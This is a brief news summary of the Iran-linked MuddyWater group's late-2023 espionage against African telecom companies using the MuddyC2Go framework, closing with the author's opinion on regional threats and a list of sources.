Iranian hackers linked to Iran’s Ministry of Intelligence and Security (MOIS) have attacked several companies in the telecommunications sector in Egypt. In Sudan, Tanzania, using a command-and-control (C2) framework called MuddyC2Go. The full capabilities of MuddyC2Go are not yet known, but the executable contains an embedded PowerShell script that automatically connects to Seedworm C2, giving attackers remote access to the victim’s system.
Known as MuddyWater, the organisation, mainly focused on cyber espionage, has been active since 2017 and has been linked to several other attacks in the Middle East.
The intrusions, which occurred in November 2023, were found to rely on a custom keylogger and other publicly available tools, in addition to SimpleHelp and Venom Proxy. Attack chains mounted by the group have a track record of weaponizing phishing emails and known reconnaissance, lateral movement, and data collection techniques.
The entity was reportedly previously compromised by the attacker in 2023, in which SimpleHelp was used to launch PowerShell, install the JumpCloud remote access tool and deliver proxy software.
“The group continues to innovate and develop its toolset when required in order to keep its activity under the radar,” Symantec concluded. “The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks.”
In October, an Iranian state-backed hacking group was caught spying on government, military and telecoms sectors in the Middle East. In September, telecoms operators in the Middle East were targeted with a new family of malware, which researchers dubbed HTTPSnoop.
The increase in the number of attacks is probably related to the ongoing conflict in the Gaza Strip, so the attacks may also serve as a warning to the countries neighbouring the conflict that Iran is still a major player in the region.
Finally, I think that we should expect similar attacks from Iranian groups in the future, and we should be prepared for them and have adequate defences against them. Iran, as a regional power, has a decisive role in the region and is ready and has the power to speak out about what is happening in the region.
Sources:
https://thehackernews.com/2023/12/iranian-hackers-using-muddyc2go-in-new.html
https://therecord.media/muddywater-cyber-espionage-africa-telecoms-iran